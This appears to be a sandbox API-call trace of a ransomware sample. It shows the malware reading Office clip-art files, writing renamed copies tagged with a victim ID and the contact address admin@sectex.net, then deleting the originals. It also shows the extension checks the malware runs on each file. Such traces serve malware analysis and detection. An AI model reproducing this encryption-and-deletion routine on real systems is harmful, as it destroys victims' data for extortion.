	[0144.926] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.926] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.926] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.927] GetLastError () returned 0x0
	[0144.927] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x964, lpOverlapped=0x0) returned 1
	[0144.952] WriteFile (in: hFile=0x39c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x970, lpOverlapped=0x0) returned 1
	[0144.952] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.953] WriteFile (in: hFile=0x39c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.953] SetEndOfFile (hFile=0x39c) returned 1
	[0144.953] CloseHandle (hObject=0x39c) returned 1
	[0144.953] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.953] SetEndOfFile (hFile=0x384) returned 1
	[0144.955] CloseHandle (hObject=0x384) returned 1
	[0144.955] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.967] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf")) returned 1
	[0145.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63
	[0145.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63
	[0145.046] lstrlenW (lpString=".doc") returned 4
	[0145.046] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.046] lstrlenW (lpString=".docx") returned 5
	[0145.046] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.046] lstrlenW (lpString=".pdf") returned 4
	[0145.046] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.046] lstrlenW (lpString=".xls") returned 4
	[0145.046] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.046] lstrlenW (lpString=".xlsx") returned 5
	[0145.046] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.047] lstrlenW (lpString=".ppt") returned 4
	[0145.047] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63
	[0145.047] lstrlenW (lpString=".zip") returned 4
	[0145.047] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.047] lstrlenW (lpString=".rar") returned 4
	[0145.047] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.047] lstrlenW (lpString=".bz2") returned 4
	[0145.047] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.047] lstrlenW (lpString=".7z") returned 3
	[0145.047] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63
	[0145.047] lstrlenW (lpString=".dbf") returned 4
	[0145.047] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63
	[0145.047] lstrlenW (lpString=".1cd") returned 4
	[0145.047] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63
	[0145.047] lstrlenW (lpString=".jpg") returned 4
	[0145.047] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63
	[0145.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63
	[0145.047] lstrlenW (lpString=".doc") returned 4
	[0145.047] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.047] lstrlenW (lpString=".docx") returned 5
	[0145.047] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.047] lstrlenW (lpString=".pdf") returned 4
	[0145.047] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.047] lstrlenW (lpString=".xls") returned 4
	[0145.047] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.047] lstrlenW (lpString=".xlsx") returned 5
	[0145.047] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.047] lstrlenW (lpString=".ppt") returned 4
	[0145.047] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63
	[0145.048] lstrlenW (lpString=".zip") returned 4
	[0145.048] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.048] lstrlenW (lpString=".rar") returned 4
	[0145.048] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.048] lstrlenW (lpString=".bz2") returned 4
	[0145.048] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.048] lstrlenW (lpString=".7z") returned 3
	[0145.048] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63
	[0145.048] lstrlenW (lpString=".dbf") returned 4
	[0145.048] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63
	[0145.048] lstrlenW (lpString=".1cd") returned 4
	[0145.048] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63
	[0145.048] lstrlenW (lpString=".jpg") returned 4
	[0145.048] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.048] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.048] lstrlenW (lpString="DD01181_.WMF") returned 12
	[0145.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.245] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=1448) returned 1
	[0145.245] CloseHandle (hObject=0x38c) returned 1
	[0145.245] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf")) returned 0x20
	[0145.245] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.246] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.246] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.246] GetLastError () returned 0x0
	[0145.246] ReadFile (in: hFile=0x38c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x5a8, lpOverlapped=0x0) returned 1
	[0145.248] WriteFile (in: hFile=0x3a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x5b0, lpOverlapped=0x0) returned 1
	[0145.249] ReadFile (in: hFile=0x38c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.249] WriteFile (in: hFile=0x3a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.249] SetEndOfFile (hFile=0x3a0) returned 1
	[0145.249] CloseHandle (hObject=0x3a0) returned 1
	[0145.249] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.249] SetEndOfFile (hFile=0x38c) returned 1
	[0145.252] CloseHandle (hObject=0x38c) returned 1
	[0145.252] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.252] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf")) returned 1
	[0145.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63
	[0145.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63
	[0145.253] lstrlenW (lpString=".doc") returned 4
	[0145.253] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.253] lstrlenW (lpString=".docx") returned 5
	[0145.253] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.253] lstrlenW (lpString=".pdf") returned 4
	[0145.253] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.253] lstrlenW (lpString=".xls") returned 4
	[0145.253] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.253] lstrlenW (lpString=".xlsx") returned 5
	[0145.253] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.253] lstrlenW (lpString=".ppt") returned 4
	[0145.253] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63
	[0145.253] lstrlenW (lpString=".zip") returned 4
	[0145.253] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.253] lstrlenW (lpString=".rar") returned 4
	[0145.253] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.253] lstrlenW (lpString=".bz2") returned 4
	[0145.253] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.253] lstrlenW (lpString=".7z") returned 3
	[0145.253] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63
	[0145.253] lstrlenW (lpString=".dbf") returned 4
	[0145.253] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63
	[0145.253] lstrlenW (lpString=".1cd") returned 4
	[0145.253] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63
	[0145.253] lstrlenW (lpString=".jpg") returned 4
	[0145.253] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63
	[0145.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63
	[0145.254] lstrlenW (lpString=".doc") returned 4
	[0145.254] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.254] lstrlenW (lpString=".docx") returned 5
	[0145.254] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.254] lstrlenW (lpString=".pdf") returned 4
	[0145.254] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.254] lstrlenW (lpString=".xls") returned 4
	[0145.254] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.254] lstrlenW (lpString=".xlsx") returned 5
	[0145.254] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.254] lstrlenW (lpString=".ppt") returned 4
	[0145.254] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63
	[0145.254] lstrlenW (lpString=".zip") returned 4
	[0145.254] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.254] lstrlenW (lpString=".rar") returned 4
	[0145.254] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.254] lstrlenW (lpString=".bz2") returned 4
	[0145.254] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.254] lstrlenW (lpString=".7z") returned 3
	[0145.254] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63
	[0145.254] lstrlenW (lpString=".dbf") returned 4
	[0145.254] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63
	[0145.254] lstrlenW (lpString=".1cd") returned 4
	[0145.254] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63
	[0145.254] lstrlenW (lpString=".jpg") returned 4
	[0145.254] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.255] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.255] lstrlenW (lpString="DD01761_.WMF") returned 12
	[0145.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.255] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4148) returned 1
	[0145.255] CloseHandle (hObject=0x38c) returned 1
	[0145.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf")) returned 0x20
	[0145.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.256] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.256] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.256] GetLastError () returned 0x0
	[0145.256] ReadFile (in: hFile=0x38c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1034, lpOverlapped=0x0) returned 1
	[0145.258] WriteFile (in: hFile=0x3a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1040, lpOverlapped=0x0) returned 1
	[0145.259] ReadFile (in: hFile=0x38c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.259] WriteFile (in: hFile=0x3a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.259] SetEndOfFile (hFile=0x3a0) returned 1
	[0145.259] CloseHandle (hObject=0x3a0) returned 1
	[0145.259] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.259] SetEndOfFile (hFile=0x38c) returned 1
	[0145.261] CloseHandle (hObject=0x38c) returned 1
	[0145.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.261] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf")) returned 1
	[0145.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63
	[0145.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63
	[0145.262] lstrlenW (lpString=".doc") returned 4
	[0145.262] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.262] lstrlenW (lpString=".docx") returned 5
	[0145.262] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.262] lstrlenW (lpString=".pdf") returned 4
	[0145.262] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.262] lstrlenW (lpString=".xls") returned 4
	[0145.262] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.262] lstrlenW (lpString=".xlsx") returned 5
	[0145.262] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.262] lstrlenW (lpString=".ppt") returned 4
	[0145.262] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63
	[0145.262] lstrlenW (lpString=".zip") returned 4
	[0145.262] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.262] lstrlenW (lpString=".rar") returned 4
	[0145.262] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.262] lstrlenW (lpString=".bz2") returned 4
	[0145.262] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.263] lstrlenW (lpString=".7z") returned 3
	[0145.263] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63
	[0145.263] lstrlenW (lpString=".dbf") returned 4
	[0145.263] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63
	[0145.263] lstrlenW (lpString=".1cd") returned 4
	[0145.263] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63
	[0145.263] lstrlenW (lpString=".jpg") returned 4
	[0145.263] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63
	[0145.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63
	[0145.263] lstrlenW (lpString=".doc") returned 4
	[0145.263] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.263] lstrlenW (lpString=".docx") returned 5
	[0145.263] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.263] lstrlenW (lpString=".pdf") returned 4
	[0145.263] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.263] lstrlenW (lpString=".xls") returned 4
	[0145.263] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.263] lstrlenW (lpString=".xlsx") returned 5
	[0145.263] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.263] lstrlenW (lpString=".ppt") returned 4
	[0145.263] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63
	[0145.263] lstrlenW (lpString=".zip") returned 4
	[0145.263] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.263] lstrlenW (lpString=".rar") returned 4
	[0145.263] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.263] lstrlenW (lpString=".bz2") returned 4
	[0145.263] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.263] lstrlenW (lpString=".7z") returned 3
	[0145.264] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63
	[0145.264] lstrlenW (lpString=".dbf") returned 4
	[0145.264] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63
	[0145.264] lstrlenW (lpString=".1cd") returned 4
	[0145.264] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63
	[0145.264] lstrlenW (lpString=".jpg") returned 4
	[0145.264] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.264] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.264] lstrlenW (lpString="DD01772_.WMF") returned 12
	[0145.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.265] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=2300) returned 1
	[0145.265] CloseHandle (hObject=0x3c0) returned 1
	[0145.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf")) returned 0x20
	[0145.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
